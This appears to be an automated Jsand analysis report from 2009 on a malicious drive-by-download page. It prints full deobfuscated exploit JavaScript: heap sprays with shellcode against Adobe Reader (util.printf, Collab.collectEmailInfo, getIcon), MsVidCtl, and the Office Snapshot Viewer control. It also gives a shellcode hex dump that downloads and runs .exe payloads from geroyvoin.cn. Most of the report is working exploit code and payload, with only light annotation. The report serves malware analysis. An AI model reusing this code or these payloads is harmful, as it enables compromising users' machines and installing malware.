Analysis report for http://geroyvoin.cn/1/show.php?s=747bbfed51
Sample Overview
| URL | http://geroyvoin.cn/1/show.php?s=747bbfed51 |
|---|---|
| MD5 | c0111429a935628b86fb7be697fc2838 |
| Analysis Started | 2009-09-09 14:19:55 |
| Report Generated | 2009-09-09 14:20:10 |
| Jsand version | 1.03.02 |
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|---|---|
| Office Snapshot Viewer | The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine | CVE-2008-2463 |
| Adobe Collab overflow | Multiple Adobe Reader and Acrobat buffer overflows | CVE-2007-5659 |
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |
| MsVidCtl Overflow | Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter | CVE-2008-0015 |
Deobfuscation results
Evals
- (repeated 1 time)
```javascript
var dkstv = [ /* long numeric array (encoded payload) omitted from this listing */ ];
```
- (repeated 1 time)
```javascript
// Deobfuscated script as recorded by Jsand; the original code is unchanged apart from
// layout and one extraction defect (`xin` restored to `x in`). Comments added.
function CheckIP() {
    var req = null;
    try { req = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) {
        try { req = new ActiveXObject("Microsoft.XMLHTTP"); }
        catch (e) {
            try { req = new XMLHttpRequest(); } catch (e) { }
        }
    }
    if (req == null) return false;
    // Server-side gate: the landing page answers "1" when this visitor should be served
    req.open("GET", "/1/show.php?get_ajax=1&r=" + Math.random(), false);
    req.send(null);
    if (req.responseText == "1") { return true; } else { return false; }
}

function Complete() {
    // Send the visitor on to a benign site once the chain has run
    setTimeout('location.href = "http://ask.com"', 10000);
}

function directshow() {
    // Heap spray, then an <object> with the MsVidCtl CLSID (CVE-2008-0015, see Exploits table)
    var shellcode = unescape(" %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3 %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3 %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698 %u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455 %uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455 %u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856 %uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u6567%u6F72%u7679%u696F%u2E6E%u6E63 %u312F%u622F%u6564%u7170%u3272%u652E%u6578%u0000");
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize + shellcode.length;
    while (bigblock.length < slackspace) bigblock += bigblock;
    var fillblock = bigblock.substring(0, slackspace);
    var block = bigblock.substring(0, bigblock.length - slackspace);
    while (block.length + slackspace < 0x30000) { block = block + block + fillblock; }
    var memory = new Array();
    for (var i = 0; i < 300; i++) { memory[i] = block + shellcode; }
    try {
        var obj = document.createElement('object');
        document.body.appendChild(obj);
        obj.width = '1';
        obj.height = '1';
        obj.data = './cosx.ipg';
        obj.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
        setTimeout(pdf(), 500);   // original bug: pdf() is called immediately, not deferred
    } catch (e) { pdf(); }
}

function pdf() {
    // Detect an Adobe Reader plugin or ActiveX control, then load ./cegmoprwx.pdf hidden
    var isInstalled = false;
    if (navigator.plugins && navigator.plugins.length) {
        for (var x = 0; x < navigator.plugins.length; x++) {
            if (navigator.plugins[x].description.indexOf('Adobe Acrobat') != -1) { isInstalled = true; break; }
            if (navigator.plugins[x].description.indexOf('Adobe PDF') != -1) { isInstalled = true; break; }
        }
    } else if (window.ActiveXObject) {
        var control = null;
        try { control = new ActiveXObject('AcroPDF.PDF'); } catch (e) { }
        if (!control) { try { control = new ActiveXObject('PDF.PdfCtrl'); } catch (e) { } }
        if (control) { isInstalled = true; }
    }
    if (isInstalled) {
        var ua = navigator.userAgent.toLowerCase();
        if (ua.indexOf("firefox") != -1) {
            var hpuz = document.createElement('embed');
            hpuz.setAttribute('src', './cegmoprwx.pdf');
            hpuz.setAttribute('href', './cegmoprwx.pdf');
            hpuz.setAttribute('type', 'application/pdf');
            hpuz.setAttribute('width', 200);
            hpuz.setAttribute('height', 200);
            hpuz.setAttribute('style', 'display:none;');
            document.body.appendChild(hpuz);
        } else {
            var hpuz = document.createElement('iframe');
            hpuz.setAttribute('src', './cegmoprwx.pdf');
            hpuz.setAttribute('width', 200);
            hpuz.setAttribute('height', 200);
            hpuz.setAttribute('style', 'display:none;');
            document.body.appendChild(hpuz);
        }
        setTimeout(flash(), 1500);   // same immediate-call bug as above
        return;
    }
    flash();
    return;
}

function flash() {
    // Parse the Flash Player version; only 9.0.x with x < 124 is served ./manual.swf
    var PlayerVersion = [0, 0, 0];
    if (navigator.plugins && navigator.mimeTypes.length) {
        var x = navigator.plugins["Shockwave Flash"];
        if (x && x.description) {
            PlayerVersion = x.description.replace(/([a-zA-Z]|\s)+/, "").replace(/(\s+r|\s+b[0-9]+)/, ".").split(".");
        }
    } else {
        try {
            var fv = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
            if (fv != null) { PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(","); }
        } catch (e) { snapshot(); return; }
    }
    var version1 = PlayerVersion[0] != null ? parseInt(PlayerVersion[0]) : 0;
    var version2 = PlayerVersion[1] != null ? parseInt(PlayerVersion[1]) : 0;
    var version3 = PlayerVersion[2] != null ? parseInt(PlayerVersion[2]) : 0;
    if (version1 == 9 && version3 < 124) {
        var ua = navigator.userAgent.toLowerCase();
        if (ua.indexOf("firefox") != -1) {
            var swfelement = document.createElement('embed');
            document.body.appendChild(swfelement);
            swfelement.width = '1';
            swfelement.height = '1';
            swfelement.src = './manual.swf';
            swfelement.type = 'application/x-shockwave-flash';
        } else {
            var swfelement = document.createElement('iframe');
            swfelement.setAttribute('src', './manual.swf');
            swfelement.setAttribute('width', 200);
            swfelement.setAttribute('height', 200);
            swfelement.setAttribute('style', 'display:none;');
            document.body.appendChild(swfelement);
        }
    }
    snapshot();
}

function snapshot() {
    // Snapshot Viewer control (CVE-2008-2463, see Exploits table): SnapshotPath is the
    // remote jpy5.exe, CompressedPath the local wab.exe path that PrintSnapshot writes to
    var x;
    var obj;
    var mycars = new Array();
    mycars[0] = 'c:/Program Files/Outlook Express/wab.exe';
    mycars[1] = 'd:/Program Files/Outlook Express/wab.exe';
    mycars[2] = 'e:/Program Files/Outlook Express/wab.exe';
    try {
        var obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
    } catch (e) {
        try {
            var obj = document.createElement('object');
            obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
            obj.setAttribute('id', 'obj');
            obj.setAttribute('width', '1');
            obj.setAttribute('height', '1');
            document.body.appendChild(obj);
        } catch (e) { Complete(); return; }
    }
    if (obj = '[object]') {   // original bug: assignment, not comparison, so always true
        for (x in mycars) {
            obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
            var buf = mycars[x];
            obj.Zoom = 0;
            obj.ShowNavigationButtons = false;
            obj.AllowContextMenu = false;
            obj.SnapshotPath = 'http://geroyvoin.cn/1/jpy5.exe';
            try {
                obj.CompressedPath = buf;
                obj.PrintSnapshot();
                var snpelement = document.createElement('IFRAME');
                snpelement.setAttribute('id', 'snapiframe');
                snpelement.setAttribute('src', 'ldap://127.0.0.1');
                snpelement.setAttribute('width', 1);
                snpelement.setAttribute('height', 1);
                snpelement.setAttribute('style', 'display:none;');
                // the report's listing is cut off at this point
```
document.body.appendChild(snpelement); var snaptimer = setInterval(snpintrvl(), 2000); } catch (e){ Complete(); return ; } } } Complete(); return ; } function snpintrvl(){ if (obj.readyState == 4){ clearInterval(snaptimer); document.getElementById('snapiframe').src = ' ldap://127.0.0.1'; clearInterval(snaptimer); } } directshow();
- (repeated 1 time)
```javascript
// Grow a NOP string until it holds len bytes, i.e. len/2 UTF-16 code units.
function fix_it(yarsp, len){
    while (yarsp.length * 2 < len){ yarsp += yarsp; }
    yarsp = yarsp.substring(0, len / 2);
    return yarsp;
}

// util.printf (CVE-2008-2992): spray 0x0A-filled blocks, then trigger the overflow with a "%45000f" format.
function util_printf(){
    var payload = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76 %u6E69%u632E%u2F6E%u2F31%u6462%u6C66%u3375%u652E%u6578%u0000");
    var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
    var heapblock = nop + payload;
    var bigblock = unescape("%u0A0A%u0A0A");
    var headersize = 20;
    var spray = headersize + heapblock.length;
    while (bigblock.length < spray){ bigblock += bigblock; }
    var fillblock = bigblock.substring(0, spray);
    var block = bigblock.substring(0, bigblock.length - spray);
    while (block.length + spray < 0x40000){ block = block + block + fillblock; }
    var mem_array = new Array();
    for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; }
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf("%45000f", num);
}

// Collab.collectEmailInfo (CVE-2007-5659): spray 4 MB elements up to 0x0c0c0c0c, then overflow the msg argument.
function collab_email(){
    var shellcode = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76 %u6E69%u632E%u2F6E%u2F31%u6762%u6E6D%u7372%u7A79%u2E33%u7865%u0065");
    var mem_array = new Array();
    var cc = 0x0c0c0c0c;
    var addr = 0x400000;
    var sc_len = shellcode.length * 2;
    var len = addr - (sc_len + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var count2 = (cc - 0x400000) / addr;   // 47.18..., so 48 copies
    for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; }
    var overflow = unescape("%u0c0c%u0c0c");
    while (overflow.length < 44952){ overflow += overflow; }
    this.collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow });
}

// Collab.getIcon (CVE-2009-0927): same spray, then a 16 KB tab-filled string as the icon name.
function collab_geticon(){
    if (app.doc.Collab.getIcon){
        var arry = new Array();
        var vvpethya = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76 %u6E69%u632E%u2F6E%u2F31%u7064%u7472%u337A%u652E%u6578%u0000");
        var hWq500CN = vvpethya.length * 2;
        var len = 0x400000 - (hWq500CN + 0x38);
        var yarsp = unescape("%u9090%u9090");
        yarsp = fix_it(yarsp, len);
        var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; }
        var tUMhNbGw = unescape("%09");
        while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; }
        tUMhNbGw = "N." + tUMhNbGw;
        app.doc.Collab.getIcon(tUMhNbGw);
    }
}

// Choose exploits from the first three digits of app.viewerVersion (so 8.1.2 -> "812").
// Note: && binds tighter than ||, so the first test also fires util_printf() for any x.1.z with z < 3.
function pdf_start(){
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); }
    if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); }
    if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); }
}
pdf_start();
```
- (repeated 1 time)
```javascript
// Identical to the previous eval except for the download filenames embedded in the three payloads.

// Grow a NOP string until it holds len bytes, i.e. len/2 UTF-16 code units.
function fix_it(yarsp, len){
    while (yarsp.length * 2 < len){ yarsp += yarsp; }
    yarsp = yarsp.substring(0, len / 2);
    return yarsp;
}

// util.printf (CVE-2008-2992): spray 0x0A-filled blocks, then trigger the overflow with a "%45000f" format.
function util_printf(){
    var payload = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76 %u6E69%u632E%u2F6E%u2F31%u6664%u7877%u2E33%u7865%u0065");
    var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
    var heapblock = nop + payload;
    var bigblock = unescape("%u0A0A%u0A0A");
    var headersize = 20;
    var spray = headersize + heapblock.length;
    while (bigblock.length < spray){ bigblock += bigblock; }
    var fillblock = bigblock.substring(0, spray);
    var block = bigblock.substring(0, bigblock.length - spray);
    while (block.length + spray < 0x40000){ block = block + block + fillblock; }
    var mem_array = new Array();
    for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; }
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf("%45000f", num);
}

// Collab.collectEmailInfo (CVE-2007-5659): spray 4 MB elements up to 0x0c0c0c0c, then overflow the msg argument.
function collab_email(){
    var shellcode = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76 %u6E69%u632E%u2F6E%u2F31%u6664%u7170%u7A75%u2E33%u7865%u0065");
    var mem_array = new Array();
    var cc = 0x0c0c0c0c;
    var addr = 0x400000;
    var sc_len = shellcode.length * 2;
    var len = addr - (sc_len + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var count2 = (cc - 0x400000) / addr;   // 47.18..., so 48 copies
    for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; }
    var overflow = unescape("%u0c0c%u0c0c");
    while (overflow.length < 44952){ overflow += overflow; }
    this.collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow });
}

// Collab.getIcon (CVE-2009-0927): same spray, then a 16 KB tab-filled string as the icon name.
function collab_geticon(){
    if (app.doc.Collab.getIcon){
        var arry = new Array();
        var vvpethya = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76 %u6E69%u632E%u2F6E%u2F31%u6564%u6A67%u3374%u652E%u6578%u0000");
        var hWq500CN = vvpethya.length * 2;
        var len = 0x400000 - (hWq500CN + 0x38);
        var yarsp = unescape("%u9090%u9090");
        yarsp = fix_it(yarsp, len);
        var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; }
        var tUMhNbGw = unescape("%09");
        while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; }
        tUMhNbGw = "N." + tUMhNbGw;
        app.doc.Collab.getIcon(tUMhNbGw);
    }
}

// Choose exploits from the first three digits of app.viewerVersion (so 8.1.2 -> "812").
// Note: && binds tighter than ||, so the first test also fires util_printf() for any x.1.z with z < 3.
function pdf_start(){
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); }
    if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); }
    if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); }
}
pdf_start();
```
Writes
No writes.
Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://geroyvoin.cn/1/show.php?s=747bbfed51 | 200 | text/html |
| about:blank | 200 | text/html |
| http://geroyvoin.cn/1/cegmoprwx.pdf | 200 | application/pdf |
Redirects
No redirects.
ActiveX controls
0955AC62-BF2E-4CBA-A2B9-A63F772D46CF (the MsVidCtl classid set by directshow() in the first eval)

Attributes
| Name | Value | Count |
|---|---|---|
| width | 1 | 1 |
| data | ./cosx.ipg | 1 |
| height | 1 | 1 |

AcroPDF.PDF

No attribute setting or method call detected.

AcrobatJavaScript (Reader JavaScript API calls made by the PDF evals)

Methods
| Name | Arg0 | Arg1 | Count |
|---|---|---|---|
| Collab.getIcon | `N.` followed by a run of 0x09 (tab) bytes; the report truncates the display ("other 15840 bytes") | | 1 |
| Collab.getIcon | as above | | 1 |
| Collab.collectEmailInfo | '' | `e0 b0 8c` repeated, i.e. the UTF-8 encoding of U+0C0C; the report truncates the display ("other 196512 bytes") | 1 |
| Collab.collectEmailInfo | '' | as above | 1 |
| util.printf | %45000f | 1.3E295 | 2 |

ShockwaveFlash.ShockwaveFlash.7

Methods
| Name | Arg0 | Count |
|---|---|---|
| GetVariable | $version | 2 |

snpvw.Snapshot Viewer Control.1 (Office Snapshot Viewer, driven by snapshot() in the first eval)

Methods
| Name | Count |
|---|---|
| PrintSnapshot | 2 |

Attributes
| Name | Value | Count |
|---|---|---|
| ShowNavigationButtons | false | 2 |
| Zoom | 0.0 | 2 |
| CompressedPath | c:/Program Files/Outlook Express/wab.exe | 2 |
| AllowContextMenu | false | 2 |
| SnapshotPath | http://geroyvoin.cn/1/jpy5.exe | 2 |

clsid:ca8a9780-280d-11cf-a24d-444553540000 (Adobe Reader browser control)

No attribute setting or method call detected.
Shellcode and Malware
| Hexadecimal | ASCII |
|---|---|
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 62 64 65 70 71 72 32 2e 65 78 65 00 00 | 3.d.@0x..@..p... X....@4.@|.X<jDZ ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f.3..ad..Ph Thre5$.itPTS.... |.U.......l...Ph on.dhurlmT..N... U..P3.PPV.U..... .LRP.6./p.U.[WV. .....U.j...http: //geroyvoin.cn/1 /bdepqr2.exe.. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 62 67 6d 6e 72 73 79 7a 33 2e 65 78 65 00 | 